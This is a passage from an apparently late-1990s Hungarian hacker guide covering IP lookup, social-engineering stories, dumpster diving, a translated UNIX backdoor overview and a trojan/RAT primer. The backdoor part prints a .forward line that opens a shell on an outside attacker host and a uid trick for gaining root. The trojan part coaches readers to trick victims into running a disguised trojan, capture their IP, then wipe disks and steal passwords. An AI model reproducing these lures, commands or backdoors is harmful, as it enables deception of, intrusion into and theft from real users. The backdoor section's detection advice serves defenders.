bepötyögöd az ICQ snifferbe és máris kész az IP. (icq-ról bővebben az icq-részbe)<br />
Pár prg ami tovább könnyíti a dolgotokat:<br />
Ping : gyors IP cím<br />
Fastscan : gyors port scanner<br />
Itt 1 kicsit bonyolultbb módszer az IP szerzésre:<br />
A következő számok ugyanannak az IP-címnek az azonos értékű +jelenései<br />
- Az IP cím bináris számként: 10000110 00011000 00001000 01000010<br />
- Az IP-cím decimális számként : 2,249,721,922 (vagy -2,045,245,374)<br />
- Az IP-cím hexadecimális számként : 0x86180842<br />
- Az IP-cím pontokkal elválasztott decimális számként : 134.24.8.66<br />
Ennyit egyenrőle az IP-ről. Még lesznek módszerek meg trükkök. Azért kell ezzel<br />
ennyit foglalkozni, mert alap dolog és majdnem mindenhez kell a továbbiakban...<br />
Dodge Viper<br />
http://w3.swi.hu/dviper<br />
************************************************************************************************<br />
Social Engineering (társadalommérnökség)<br />
Social Engineering, azaz emberek manipulálásával bejutni számítógépes<br />
rendszerbe. Ne higgyük azt, hogy ez nem igazi Hacker módszer. Ezt a módszert<br />
alkalmazta a nagy hacker Kevin Mitnick is sokszor. A Hackerek és Crackerek között<br />
nagyon kevés a nő, mégis vannak +határozó személyek. A Social Engineering<br />
módszert nagyon magas szinten alkalmazó Hacker is nő volt. Susan Thunder, aki<br />
mellesleg Kevin Mitnick környezetében tartózkodott. Nézzünk + Susan hogyan<br />
bizonyította be, hogy a módszer nagyon is hatékony... A törés helye 1 tárgyalóterem<br />
volt, ahol a tengerészet és a légierő magas rangú tisztjei ültek. Susannak 1 borítékot<br />
adtak, amiben a +adták a computerközpont nevét, amit + kellett törni. A cél<br />
86
Hackers’ Guide<br />
érdekében bármilyen eszközt igénybe vehetett (computer, modem , telefon ). Susan<br />
rögtön csatlakozott a könnyen hozzáférhető katonai számítógépre, és kikereste a<br />
főbb adatokat. A lényeg az volt, hogy kikereste a gépet karbantartó emberke nevét.<br />
Felhívta a bázist telefonon, és kiderítette, hogy ki a parancsnok. Nem kellet mást<br />
tennie csak használni a szakzsargont és máris az ölébe hullott az infó, hogy Hasting<br />
őrnagy az akit keres. Még azt is sikerült kiderítenie, hogy az őrnagy titkárnőjét<br />
Hastingsnak hívják.. Ennyi infó elég volt, hogy felhívja a +törendő<br />
számgépközpontot. A következők hangzottak el.<br />
-Buchanan vagyok. Az őrnagy +bízásából telefonálok, mert nem tud beloggolni a<br />
rendszerbe.. Az őrnagy kérdezi, hogy ennek mi az oka.<br />
(a rendszergazda +tagadta a választ.)<br />
(ekkor Susan erősebb hangnemet vett föl)<br />
-Nézze nem azért telefonáltam, hogy az időmet fecséreljem! Mi a neve, beosztása,<br />
és szolgálati száma?<br />
Még 20 perc sem telt el és Susan birtokában voltak az első titkos infók.. Mielőtt<br />
tovább lépett volna, a tábornok felállt az asztaltól és csak annyit mondott, hogy ennyi<br />
1enlőre elég lesz…..<br />
Tehát bebizonyosodott az, hogy minden rendszer leggyengébb láncszeme az ember.<br />
Az se véletlen, hogy a számitógépes betörések nagy részét belső emberek követik<br />
el. 1 hacker számára a leg1*űbb +oldás pénzzel, zsarolással belső kapcsolatra szert<br />
tenni. Éppen erre szolgál a Social Engineering. Akinek nincs elég pénze lefizetni 1<br />
rendszergazdát az vezzese félre azt. El kell vele hitetni, hogy ő 1 jogosult<br />
felhasználó.<br />
Már említettem hogy Kevin Mitnick is használta ezt a módszert előszerettel. Lássuk,<br />
hogyan tette. A Los Angelesi COSMOS központjába lopakodott. Rövid 1eztetés után<br />
Mitnick és két társa, Roscoe , és Mark Rossl 1*üen besétált az épületbe, és<br />
odament az ügyeletes tisztviselő asztalához. Kiadtág magukat a Pacific Bell<br />
alkalmazottainak. Azt a szöveget nyomták, hogy másnapra + kell írniuk 1 jelentést.<br />
Még az azonosítószámukat sem kérték……Az út szabad volt +keresték a 108-as<br />
szobát. Amit már előzetes informálódás során kiderítették, hogy az a szoba érdekes<br />
nekik.. Majd a rendszergazda szobájába találtak 6 darab kézikönyvet, amiben a<br />
Cosmos computerről volt minden információ. Magukhoz is vették 1ből. Majd<br />
kisétáltak.<br />
Több cikket is olvastam különböző külfoldi lapokon erről a témáról, és mind1iken<br />
máshogy szerepelnek az adatok/tények, a módszer lényeget leírtam, az ugyanaz volt<br />
mind1ikben.<br />
Dodge Viper<br />
1999.12.20.<br />
http://w3.swi.hu/dviper<br />
************************************************************************************************<br />
Trashing or dumpster diving (kukabúvárkodás)<br />
87
Hackers’ Guide<br />
A hackerek közkedvelt módszere a kukabúvárkodás. Vagyis elmennek a kiszemelt<br />
céghez este, és ott átkutatják a szemeteseket. A kidobott szemétben próbálnak<br />
minél több hasznos infót összegyűjteni. Ilyenkor minden kis adat fontos lehet. Az<br />
adott személy hova jár szórakozni, kedvenc étele, a kidobott papírok alapján + kell<br />
próbálni kideríteni a jelenlegi vagy régi loginnevet/jelszót. Elég fura elképzelni, hogy<br />
az információ szabadságharcosai ott álnak a kuka előtt és könyékig benne túrnak.<br />
De hát ez van. A célért mindent! Ezt a módszert is alkalmazta a legnagyobb hacker,<br />
Kevin Mitnick és társa Blake Harris is, amikor a Cosmos központjába próbáltak<br />
behatolni. Sajnos valaki/valakik már +előzték őket.<br />
Dodge Viper<br />
1999.12.25.<br />
http://w3.swi.hu/dviper<br />
************************************************************************************************<br />
Backdoors<br />
Az elso betoresek ota a hackerek mindig megprobaltak ujabb technikakat es<br />
kiskapukat talalni, amellyekkel bejuthatnak a rendszerbe. Ebben a doksiban<br />
megemlitek nehany backdoort illetve a felismeresukrol is lesz par mondat. Nagyreszt<br />
a UNIX-rol lesz szo, de a Windows NT-rol is lesz egy resz. A leiras bemutatja, hogy a<br />
behatolok hogyan juthatnak be a rendszerbe, illetve segitseget nyujt az<br />
adminisztratoroknak, az ujabb tamadasok ellen. Mikor egy adminisztrator tudja, hogy<br />
milyen nehez egy betolakodot eltavolitani, ha mar az egyszer bejutott, akkor ertheto,<br />
hogy megbecsuli az elozetes vedekezest. Ez abbol all, hogy minnel tobb a kezdo es<br />
profi hackerek altal hasznalt rest derit fel. Persze nem az osszeset, hisz a<br />
lehetosegek szama vegtelen.<br />
Egy bacdoor a legtobb betolakodonak ket, vagy 3 dolgot nyujt:<br />
Kepes visszaterni a gepbe, meg akkor is, ha az adminisztrator megprobalja azt<br />
biztonsagosabba tenni PL.: a passwordok kicserelesevel Kepes legyen visszaterni a<br />
rendszerbe a leheto legrovidebb ido alatt. A legtobb hacker szeret egyszeuen<br />
visszaterni a rendszerbe az egesz gep ujrefeltorese nelkul. Nehany esetben, ha a<br />
hacker ugy erzi, hogy az adminisztrator talat egy altala letrehozott rest, akkor a gep<br />
sebezhetoseget, kihasznalva lep be ujra. Igy elkeruli azt, hogy az adminisztrator<br />
esetleg felfedje. Nehany esetben a gep sebezhetosege marad az egyetlen backdoor.<br />
A password feltores<br />
Az elso es a legosibb modszer a bejutasra nem csak a UNIX-on, hanem a tobbi<br />
rendszeren is a password feltoro programok futtatasa. Ezzel szerezhetok egyszeru<br />
88
Hackers’ Guide<br />
passwordos accountok. Igy az osszes feltort kulcsszo backdoor lehet addig, amig az<br />
adminisztrator le nem tiltja oket. Sokszor a behatolo olyan hasznalatlan accountokat<br />
keres, amelyeknek egyszeru passwordjeik vannak, amiket aztan kesobb<br />
bonyolultabbakra nevezhet at, igy amikor az adminisztrator gyenge passwordoket<br />
keres, a modositattakat mar nem fogja megtalani. Igy az adminisztrator, mar nem<br />
fogja olyan egyszeruen megtalani azokat az accountokat, amelyeket meg kell<br />
szuntetnie.<br />
Rhosts + + A halozatba kotott UNIX gepeke az Rsh es az Rlogin szolgaltatasoknal<br />
csak egyszeruen az rhost fileban levo hostnev alapjan azonositjak a gepeket. A<br />
felhasznalo konnyen beallithatja, hogy melyik gepektol nem ker passwordot<br />
belepeskor. Egy hacker ez kihasznalhatja, ha egy "+ +" -t beir az aldozat gepenek<br />
rhost filejaba, ekkor ugyanis barki hasznalhatja azt az accountot password nelkul.<br />
Rengeteg hacker kihasznalja ezt, amikor az NFS exportalja a home konyvtarat a<br />
vilagnak. Ezeken a hatso ajtokon a hackerek visszaterhetnek a rendszerbe. Sok<br />
hacker jobban szereti az Rst-t, mint az Rlogint, mert az a legtobb rendszerben le van<br />
tiltva, vagy lockolva van. Sok adminisztrator keresi a "+ +" -t ezert a legtobb hacker<br />
egy hostnevet es egy felhasznaloi nevet rak a fileba egy masik feltort geprol, igy<br />
kevesbe feltuno a dolog.<br />
Checksum es Timestamp<br />
Regen sokan kicsereltek a binaros fileokat a sajat trojai programjaikkal. Sok<br />
adminisztrator hasznalt ido es adatvaltozast figyelo programokat, PL.: a UNIX<br />
checksum programjat, hogy eszrevegyek, ha egy binaris file megvaltozott. A<br />
hackerek rajottek a technologiara, amivel a trojai program idejet beallithattak az<br />
eredeti programeval megegyezore. Ez ugy mukodott, hogy a rendszerorat<br />
visszaallitottak az eredeti file idejere es ekkor raktak fel a trojai progit, majd a vegen<br />
visszaalitottak az eredeti idot a rendszeroran. A sum program a CRC cheksumra<br />
tamaszkodik es ez konnyen kijatszhato. A hackerek olyan programokat keszitettek,<br />
amelyek a trojai program meretet az eredeitiere modositottak, ezzel megoritve az<br />
adminisztratorokat. MD5 az arusok altal legtobbet ajanlott checksum program<br />
napjainkban. Az MD5 egy olyan algoritmuson alapul, amelyen a datumot<br />
bizonyitottan meg senki nem tudta kijatszani.<br />
Login<br />
A UNIX-on a login az a program, amelyik altalaban ellenorzi a passwordot, amikor<br />
valaki betelnetel a gepbe. A hackerek elloptak a login program forras kodjat es ugy<br />
modositottak azt, hogy amikor a login osszehasonlitja a felhasznalo passworjet a<br />
tarolt jelszavakkal, akkor eloszor a backdoort ellenorzi. Ha a felhasznalo beirta a<br />
backdoor jelszot, akkor beenged attol fuggetlenul, hogy az adminisztrator milyen<br />
jelszot allitott be. Ez azt jelenti, hogy a hacker barmilyen accountba rootkent<br />
jelentkezhet be. A jelszo backdoorrla azelott be lehet jutni, mielott a felhasznalo<br />
bejelentkezne es megjelenne az utmp-ben es a wtmp-ben. Igy a hacker ugy tud<br />
bejelentkezni a rendszerbe es futtatni egy shellt, hogy senki nem latja a rendszeren<br />
az accountjat. Az adminisztratorok elkezdtek figyelni ezeket a kiskapukat ugy, hogy<br />
csinaltak egy "string" parancsot amivel megkereshetik a programban levo<br />
szovegeket. Sokszor megtalaltak a rejtett jelszavakat. A hackerek ezutan<br />
bonyolutabb jelszavakat hasznaltak, vagy jobban elrejtettek oket, igy nem lehetett<br />
csak siman a stringgel megtalalni oket. Sok adminsztrator megtalalja ezeket a rejtett<br />
jelszavakat az MD5 checksummal.<br />
89
Hackers’ Guide<br />
Telnetd<br />
Amikor egy felhasznalo betelnetel egy gepbe, akkor az inetd figyeli a portot es<br />
fogadja a hivast, majd tovabbadja az in.telnetd-nek, amely aztan futtatja a logint.<br />
Nehany hacker rajott, hogy az az adminisztratorok meg szoktak buheralni a login<br />
programot, igy ok modositottak az in.telnetd-t. Az in.telnetd rengetek dolgot tartalmaz<br />
a felhasznalorol, pl.: azt, hogy milyen terminalt hasznal. Az atlag terminal beallitas az<br />
Xterm, vagy a VT100-as. A hacker ezt kihasznalhatja ugy, ha a terminalt "letmein"-re<br />
allitja, igy barki indithat a rendszerben shellt azonositas nelkul. Az igy beallitot<br />
rendszereken a megfelelo portokon keresztul barki futtathat shellt.<br />
Services Szinte minden halozatot feltortek mar legalabb egyszer. Az atirt verzioi a<br />
finger-nek, az rhs-nak, az rexec-nek, az rlogin-nak, az ftp-nek es meg folytathatnama<br />
vegtelensegig. Vannak programok, amelyek nem csinalnak tobbet, mint csatlakoznak<br />
a TCP porthoz es bejuttatjak a hackert. Neha ritkan hasznalt parancsokat cserelnek<br />
ki ezekre a programokra, pl.: az uucp-t, vagy egyszeruen beirjak oket az inetd.conf<br />
fileba, mint egy uj parancsot. Az adminisztratoroknak nagyon figyelniuk kell, hogy<br />
milyen parancsokat futtatnak es ellenorizniuk kell az eredeti parancsokat az MD5<br />
checksummal.<br />
A Cronjob naplozza a UNIX rendszereken, hogy mikor kell bizonyos programokat<br />
futtatni. Egy hacker beleirhatja, hogy futtassa ejjel 1 es 2 kozt egy shellt. Igy a hacker<br />
1 orara belephet az ejjel folyaman. A hackerek atlagosan futtatott programokat<br />
kerestek es azokba epitettek be a kiskapukat.<br />
Library A legtobb UNIX rendszer hasznal osztott konyvtarakat. Ezek arra valok,<br />
hogy a sokszor hasznalt rutinoknak ne kelljen mindig ujra helyet foglalni, ezzel<br />
csokken a programok merete. Nehany hacker megbuheralta ezeket a rutinokat,<br />
peldaul a crypt.c-t es a _crypt.c-t. A login.c hasznalja a crypt() rutint es ha a beepitett<br />
passwordot hasznalod, akkor ad egy shellt. Igy az adminisztratorok hiaba ellenoriztek<br />
le a login programot az MD5-tel, meg mindig maradt egy backdoor rutin, ha az<br />
adminisztrator nem ellenorizte le az osztott konyvtarakat.<br />
Gondot okozott a hcakereknek, amikor az adminisztratorok elkezdtek hasznalni az<br />
MD5-ot. A hackerek egyik modszere az open(), vagy a file hozzaferesi rutinok atirasa<br />
volt. Az atalakitott rutinok ugy voltak konfigutalva, hogy az eredeti fileokat olvassak,<br />
de a trojanokat futtassak. Igy amikor az MD5 olvasta ezeket nem tortent semmi<br />
kulonos, de amikor a rendszer futtatta oket, akkor a trojai verzio indult el. Igy a trojai<br />
konyvtarakat el lehetett rejteni az MD5 elol. Az adminisztartorok egy modon<br />
talalhattak meg ezeket a konyvtarakat, ha statikailag hozzalinkeltek az MD5-ot es<br />
ugy futtattak a rendszeren. A statikusan linkelt program nem a trojai verziot<br />
hasznalja.<br />
Kernel<br />
A kernel a UNIX magja. Kernel szinten ugyanigy kikerulheto az MD5 checksum,<br />
hacsak egy statikusan linkelt program elnem arulja a kulonbseget. Egy jo kernel<br />
backdoort a legnehezebb egy adminisztratornak megtalani. "Szerencsere" a kernel<br />
backdoor scriptek meg nem igazan vannak elterjedve, bar valojaban senki sem tudja,<br />
hogy milyen szeles korben terjedtek mar el.<br />
File-rendszerek<br />
Egy hacker a zsakmanyat, vagy adatait ugy akarja tarolni a rendszeren, hogy az<br />
adminisztrator ne talalja meg oket. Egy hacker cuccai altalaban exploit scriptekbol,<br />
90
Hackers’ Guide<br />
backdoorokbol, sniffer logokbol, masolt adatokbol, pl.: e-mailekbol, forraskodokbol es<br />
hasonlo dolgokbol allnak. Ahhoz, hogy ezeket a neha igen nagy fileokat el lehesszen<br />
rejteni, at kell kicsit irni nahany rendszer parancsot, peldaul az "ls"-t a "du"-t es az<br />
"fsck"-t. Nagyon alacsony szinten a hacker bad szektoroknak is alcazhatja oket. Igy a<br />
hackernek specialis programokra lesz szuksege, hogy hasznalhassa a cuccait, de az<br />
adminisztrator csak nagyon nehezen johet ra, hogy nem is valodiak a bad szektorai.<br />
Boot-szektor A PC-s vilagban nagyonsok virus keszult, amelyik a bootszektorban<br />
rejti el magat, ezert sok virusirto vizsgalja, a bootszektor valtozasait. UNIX-on a<br />
legtobb adminisztratornak nincs olyan programja, amivel a bootszektort<br />
ellenorizhetne, igy elrejtheto nehany backdoor a bootszektorban.<br />
Process elrejtese Egy hacker igen sokszor el akarja rejteni, hogy eppen milyen<br />
programot futtat. Altalaban a password feltoro programokat es a sniffereket akarjuk<br />
elrejteni. Eleg sok megoldas van, itt van nahany ismertebb:<br />
Lehet irni egy programot, amivel az argv[] atirhato egy masik processz azonositojara.<br />
At lehet nevezni a sniffert egy legalis program nevere, pl. in.syslog es futtatni. Igy<br />
amikor az adminisztrator csinal egy "ps"-t, hogy megnezze mit futtatsz, akkor<br />
szabalyos nevet mutatja neki.<br />
At lehet irni a konyvtarfuggvenyeket, hogy a "ps" ne mutasson meg minden<br />
processzt.<br />
A megszakitas vezerlo rutinba is lehet rakni egy backdoort, hogy ne jelenjen meg<br />
minden a processz tablabol. Erre egy lelda az amod.tar.gz, amit a<br />
http://star.niimm.spb.su/~maillist/bugtraq.1/0777.html cimen nezhetsz meg.<br />
A kernel modositasaval is el lehet rejteni bizonyos processzeket.<br />
Rootkit A legnepszerubb backdoorok koze tartozik a rootkit. Ez konnyen<br />
megtalalhato az Internetes keresokkel. Itt van nehany fontos resz a README-bol:<br />
• z2 - Torli a bejegyzeseket az utmp-bol, a wtmp-bol es a lastlog-bol.<br />
• Es - rokstar ethernet sniffere a sun4 alapu kernelekhez<br />
• Fix - megprobalja meghamisitani az ellenorzo programokat, egy file<br />
segitsegevel<br />
• Sl - titkos root passwordot ad<br />
• Ic - Az ifconfigot modositja<br />
• ps - processzrejtes<br />
• Ns - a netstatot modositja, hogy elrejtse a mas gepekkel valo kapcsolatot<br />
• Ls - filok es konyvtarak elrejtese listazaskor<br />
• du5 - elrejti, hogy mennyi helyet foglalsz a merevlemezen<br />
• ls5 - filok es konyvtarak elrejtese listazaskor<br />
91
Hackers’ Guide<br />
Halozatforgalom<br />
A hackerek nemcsak a filejaikat, de a halozaton valo mozgasukat is el akarjak rejteni,<br />
amennyire csak tudjak. A halozaton neha egy hackernek tuzfalakon kell keresztul<br />
jutnia. Rengeteg halozati backdoor program van, amivel a hacker beallithat maganak<br />
egy port szamot es azon keresztul a normalis ut megkerulesevel juthat be mindig.<br />
Mivel a forgalom nem egy altalanos porton keresztul tortenik, az adminisztrator<br />
megnezheti a hacker forgalmat. Ezek a halozati backdoorok altalaban TCP-t, UDP-t,<br />
es ICMP-t hasznalnak, de lehet barmi mast is.<br />
TCP Shell<br />
A hacker beallithat egy nagyon magas portszamu TCP shell backdoort maganal, ahol<br />
valoszinuleg a tuzfal nem blokkolja a TCP portot. Ezek sokszor csak egy jelszoval<br />
vannak vedve, igy amikor egy adminisztrator csatlakozik, nem fogja rogton latni a<br />
shellt. Az adminisztrator a netstat-tal nezhet utana, hogy mely portok foglaltak es<br />
honnan, illetve hova vannak kapcsolatok. Sokszor ezek a backdoorok engedik a<br />
hackert, hogy belepjen a TCP Wrapper technologiaval. Ezek a backdoorok az SMTP<br />
porton futtathatok, amelyen nagyonsok tuzfal engedelyezi az e-mail forgalmat.<br />
UDP shell<br />
Az adminisztratorok nagyon sokszor kiszurjak a TCP kapcsolatot es feljegyzik a<br />
kulonos viselkedest, de az UDP shellhez egyaltalan nem kell kapcsolat, igy a netstat<br />
sem mutatja ki, hogy hacker van a rendszerben. Sok tuzfal engedi peldaul az UDP<br />
csomagok hasznalatat a DNS-en keresztul. Sokszor a hackerek ezen a porton<br />
helyezik el a backdoort es igy kikerulheto a tuzfal.<br />
ICMP shell<br />
A pingeles az egyik legaltalanosabb mod annak a kideritesere, hogy egy rendszer<br />
mukodik-e. Ez ICMP csomagok kuldesevel es fogadasaval dolgozik. Sok tuzfal<br />
engedi, hogy belso gepeket pingeljunk. Egy hacker adatokat rakhat az ICMP<br />
csomagokba es egy shellt hozhat letre a pingelo gepek kozt. Az adminisztrator<br />
eszlelheti a sok pingelest, de ha nem veszi eszre az adatokat a csomagokban, akkor<br />
a hacker felderitetlen marad.<br />
Encrypted link<br />
Az adminisztrator csinalhat egy sniffert, hogy megnezze az adatmozgasokat, ha<br />
valaki csatlakozik egy shellhez, de a hacker "can add encryption" ??? a halozati<br />
backdoorokhoz es ezzel szinte lehetetlenne valik a ket gep kozti adatforgalom<br />
figyelese.<br />
Windows NT<br />
Mivel a Windows NT nem igazan tobbfelhasznalos rendszer a kulonallo gepeken es<br />
a tavoli bejelentkezes hasonlo, mint a UNIX-on, nehezebb betorni, backdoorokat<br />
berakni es tamadasokat futtatni egy NT-s rendszerrol. Igy sikeresebben tamadhatok<br />
a UNIX rendszerek, mint a Windows NT. Ha a Windos NT a tobbfelhasznalosag fele<br />
halad, akkor ez tobb lehetoseget ad a Windows NT-t hasznalo hackereknek. Ha ez<br />
tortenik, akkor sok UNIX backdoor atultetheto lesz az NT-re is es akkor<br />
keszulodhetnek az adminisztratorok a hackerek ellen. Ma mar vannak telnet<br />
daemonok a Windows NT ala. Halozati forgalom backdoorokkal konnyen kijatszhato<br />
az NT.<br />
Megoldasok<br />
Ahogy a backdoor technologia fejlodik, egyre nehezebb az adminisztratoroknak<br />
92
Hackers’ Guide<br />
eszrevenni, hogy van-e hacker a rendszerben, vagy sikerult-e teljesen eltavolitani<br />
oket.<br />
Kiertekeles<br />
Az egyik elso lepes a vedelemben az, hogy kiertekeld, milyen sebezheto a<br />
halozatod, igy kitalalhatod, hogy melyik lyukakat kell kijavitanod. Sok eszkoz van,<br />
ami figyeli es atvizsgalja a halozat es a rendszer sebezhetoseget. Egyszeru,<br />
konnyen beszerezheto progikkal is rengeteget javithat barki a rendszere<br />
bizronsagan.<br />
MD5<br />
Az MD5 feltetlenul szukseges a rendszer vizsgalatahoz. Az MD5-ot a meg tiszta,<br />
feltoretlen rendszerekre kell felrakni. Ha egyszer egy hacker mar bejutott, akkor<br />
nagyon nehez ujra biztonsagossa tenni a rendszert. Sok meghackelt cegnek tobb<br />
honapig tart kizarni a hackereket a rendszerukbol. Nehany ceg, mikor rajott, hogy<br />
meghackeltek oket, visszaallitotta a backup-okat, remelve, hogy ezzel minden<br />
backdoort eltuntetnek. A dolog sikertelen volt, mivel a tobbi filelal egyutt a<br />
hackelteket is visszaraktak. Ezert kell a fileok binaris osszehasonlitasat meg a<br />
tamadas elott elvegezni.<br />
Betolakodo felismerese<br />
A betoresek felismerese sokkal fontosabba valik, mint a szervezetek osszekotese es<br />
a gepek osszekapcsolasanak engedelyezese. A regebbi betores felismero<br />
rendszerek a logolason alapulnak. A legujabb fejlesztesek (IDS) pedig a realtime<br />
sniffereken es a halozati forgalom figyelesen. Eleg sok halozati backdoor konnyen<br />
felismerheto. A legutobbi IDS megnezi a DNS UDP csomagokat es ellenorzi, hogy<br />
azok passzolnak-e a kero DNS protokolljahoz. Ha a DNS porton az adat nem<br />
egyezik a DNS protokallal, akkor eltarolja az adatot egy kesobbi elemzesre es egy<br />
figyelmezteto jelzessel latja el. Ugyanez tortenik az ICMP csomagokkal is.<br />
Megvizsgalja, hogy egyszeru pingrol van-e szo, vagy tartalmaz encrypted shell<br />
reszeket is.<br />
Bootolas CD-rol<br />
Sok adminisztrator szerint a CD-rol valo bootolas jo megoldas, hiszen a hackerek a<br />
CD-kre nem tudnak backdoorokat rakni. Ezzel annyi a gond, hogy sokba kerul es az<br />
egesz ceget el kell latni az eszkozokkel.<br />
Eberseg<br />
Mivel a biztonsagi megoldasok gyorsan valtoznak es nap mint nap ujabb es ujabb<br />
gyenge pontokat talalnak a hackerek, amiket ki is hasznalnak, nem art ebernek<br />
lennunk.<br />
Vigyazz, mert nincs feltorhettetlen rendszer es semmi sem helyettesitheti az allando<br />
eberseget.<br />
Ez meg hozzaadhato:<br />
.forward backdoor<br />
A UNIX gepeken a .forward file is egy altalanos megoldas a belepesre. A belepeshez<br />
a egy usernek a .forward fileba a kovetkezoket kell beirnia:<br />
\username<br />
93
Hackers’ Guide<br />
|"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e /bin/sh"<br />
ennek a kulonbozo valtozatai megvaltoztatjak a rendszer mail aliasait (altalaban ezek<br />
a /etc/aliases-ben talalhatok). Ez csak egy egyszeru valtozat volt, egy bonyolultabb<br />
egy scriptet is futtathat a .forward filebol, amiben bonyolultabb parancsok is lehetnek.<br />
Ui.: A fenti modszerrel be lehet jutmi a cegek levelezo rendszeren keresztul<br />
(feltetelezve, hogy osztott a home konyvtar a szerveren es a kliensen is). Az smrshval<br />
kiloheto ez a backdoor (de meg igy is lehet egy kis gond, ha engedelyezed az<br />
elm szurojet, vagy a procmail-t, mert ezek futtathatnak parancsokat...)<br />
Ez is egy jo kis backdoor:<br />
A rossz uid/gid beallitasoknal a /etc/password fileban, tobbnyire a login(1) rosszul<br />
ismeri fel a uid/gui -t es az atoi(3) az uid/gid -et 0-ra allitja, igy superuseri jogokat<br />
kapsz.<br />
pl.:<br />
rmartin:x:x50:50:R. Martin:/home/rmartin:/bin/tcsh<br />
A linux gepeken ez 0-as uidot ad rmartinnak.<br />
VEGE Hat azt abszolute nem mondhatnam, hogy hibatlan lett a szoveg, de<br />
szerintem aki akar, az tud tanulni belole...<br />
1999.08.05<br />
SM-TRAX's got the groove!<br />
Irta: Christopher Claus 8/4/97<br />
Forditotta: YLOZ<br />
vargaz@iit.uni-miskolc.hu<br />
http://www.extra.hu/yloz Az eredeti angol verziot a kovetkezo cimen nezheted meg:<br />
http://www.extra.hu/yloz/stuff.html -.oOo..backdoor.txt..oOo.-<br />
************************************************************************************************<br />
Mi is az a trojai program<br />
Nagy sok ember tette már fel nekem azokat a kérdéseket, hogy hogyan kell<br />
használni a trojai programokat, hogyan kell valakinek a gépét megfertozni, mik<br />
valójában és hogyan muködnek? Tehát most megpróbálok minél érthetobben és<br />
átfogóbban válaszolni ezekre a kérdésekre.<br />
Összedobta: Nestan<br />
1. Mi is az a trojai program?<br />
Elso lépésben tehát megpróbálom körülírni. A trojai programok nem tartoznak a<br />
legitim programok közé. A Mikroszkópnak és Bill boynak köszönhetoen pedig<br />
felkerültek a vírus listákra, tehát egyes víruskeresok kiírják a találatok között. Ebbol<br />
következik, hogy alkotóik nem szoftvercégek, hanem olyan magányos farkasok<br />
illetve csoportok, akik a programokhoz hasonló illegális tevékenységet folytatnak<br />
94
Hackers’ Guide<br />
(például hacker és cracker bandák). A Trojan programokat az angol nyelv RATnek(patkány)<br />
hívja, de ez egy rövidítés, ami a Remote Administration Tools (Távoli<br />
Adminisztrációs Eszköz) szavak kezdobetuit takarja. A program kezeloje egy távoli<br />
géprol (ami lehet akár a földgömb másik végén is) irányít egy gépet, utasítsokat ad,<br />
úgy, hogy az áldozat mit sem sejt az egészrol. Nevüket a szerzok általában valami<br />
mítikus történethez, nagy csatához, ellenségekhez kapcsolják. Érdekesség még,<br />
hogy a névhez kötheto számok általában az adott trojai portszáma is. Vegyük például<br />
a Satan Backdoor nevu elég ismert trojai programot, ami a 666-os portot használja,<br />
nemhiába, hiszen a 666 a sátán száma. Ezek a programok két részbol épülnek fel.<br />
Van egy kiszolgáló rész, ami lényegesen kisebb méretu, ezt hívjuk szervernek és<br />
van egy méretileg nagyobb ügyfélprogram (client). Ha trojai programmal szeretnél<br />
mások gépe felett szinte korlátlan hatalomhoz jutni, akkor valamilyen módon el kell<br />
juttatni hozzá a szerver részt és rá kell venni, hogy indítsa el. Ezek után már csak az<br />
IP száma kell és már meg is van.<br />
Megjegyzés:<br />
Ahhoz, hogy megtudd szerezni a lamer IP számát, elosször is rá kell venni, hogy<br />
használjon valamilyen valós ideju chat programot (pl. ICQ, IRC), mondd azt, hogy<br />
szeretnél vele jókat dumálni meg még néhány süket duma. Ha kéri, elküldöd neki email-en<br />
keresztül, ekkor udvariasan mellékeled a trojai szerver részét, azzal a<br />
megjegyzéssel, hogy ha ezt elindítod akkor regisztrálja neked a programot, ha<br />
viszont o tölti le, akkor mondd azt, hogy "itt egy kép rólam" sfx-el tömörítve, ha<br />
megakarod nézni, akkor indítsd el és o automatikusan kitömörítni magát. Persze<br />
ekkor 10 percen belul jön a válasz, hogy o mindenhol kereste, de sehol sincs. Van<br />
még egy variáció... A neten találhatók olyan programok melyek megfertoznek egy<br />
adott felhasználói programot a trojaival. Mialatt o keres, te már meg is nézted az IP<br />
számát. ICQ-ban a Windows könyvtárában lévo netstat programocska segítségével,<br />
amely a hozzád kapcsolódók Host nevét írja ki, ha a host név megvan, akkor tracert<br />
hostnev és lön IP... IRC-ben pedig "dns/ becenév" paranccsal, ennyi. Most már tied a<br />
hatalom, csak tudni kell vele élni, persze az ICQ-s módszert lehet használni IRC-nél<br />
is.<br />
A legújabb trojai programok egy részében már beépített funkció(pl. Netbus 1.7), hogy<br />
a szerver futtatása után automatikusan (SMTP) küld neked egy levelet, amelyben<br />
közli veled, hogy sikeresen beírta magát a rendszerbe, rezidensé vált, mellékeli a<br />
fobb információkat és természetesen az ürge IP számát. Ha megkaptad a levelet és<br />
sikeresen felvetted a kapcsolatot az áldozat gépén futó szerverrel, akkor innen már<br />
szinte mindenre képes leszel, olyan mintha ott ülnél a helyén és te irányítanád a<br />
gépét, persze csak addig, amíg le nem megy a netrol.<br />
A trojai programok nagyobbik része már képes a fájlkezelésre. Ezáltal képes vagy<br />
programokat futtatni / nézni / törölni / áthelyezni / feltölteni az o merevlemezén. Ez<br />
korlátlan hatalmat ad a kezedbe. Ennek segítségével te akármit feltölthetsz az<br />
áldozat gépére (fájlokat, vírusokat, más trojai programokat, stb.) és futtathatod is<br />
ezeket. Néhány a közelmultban megjelent trojai programban már beépített funkció az<br />
egyszeru formázás az áldozat gépén (Format c:\) Ennek segítségével teljesen le<br />
tudod törölni merevlemezének tartalmát. Az új, hatásosabb változatok segítségével<br />
listát kérhetsz az eltárolt kódokról (password) és így például megtudod szerezni az o<br />
kapcsolt vonalas internetszolgáltatásának azonosítóját és kódját is. Néhány nagyon<br />
kellemetlen, mások számára idegesíto funkciót is tartalmaznak mint például a rejtett<br />
95
Hackers’ Guide<br />
egér, egér irányítás, cd olvasó kinyitása és bezárása, windows újraindítása, Internet<br />
Explorerben vagy Netscapeben URL azonnali megnyitása, képek megjelenítése az<br />
áldozat gépén, jegyzettömb tömeges megnyitása meg efféle jópofa dolgok (persze<br />
ez csak a lamerekkel fordul elo). Ez nem annyira káros, de eléggé fel tudja az illetot<br />
bosszantani.<br />
2. Hogyan is muködnek ezek a programok?<br />
Amikor a lamer gépén fut a trojai szerver része, akkor egy speciális portot nyit meg,<br />
amire bárki felcsatlakozhat. Ehhez kellenek általában a port scannerek, melyek<br />
segítségével megtudhatjuk a nyitott és a foglalt portokat. Természetesen te a porton<br />
keresztül trojai szerveréhez csatlakozol és vele kommunikálsz, nem pedig<br />
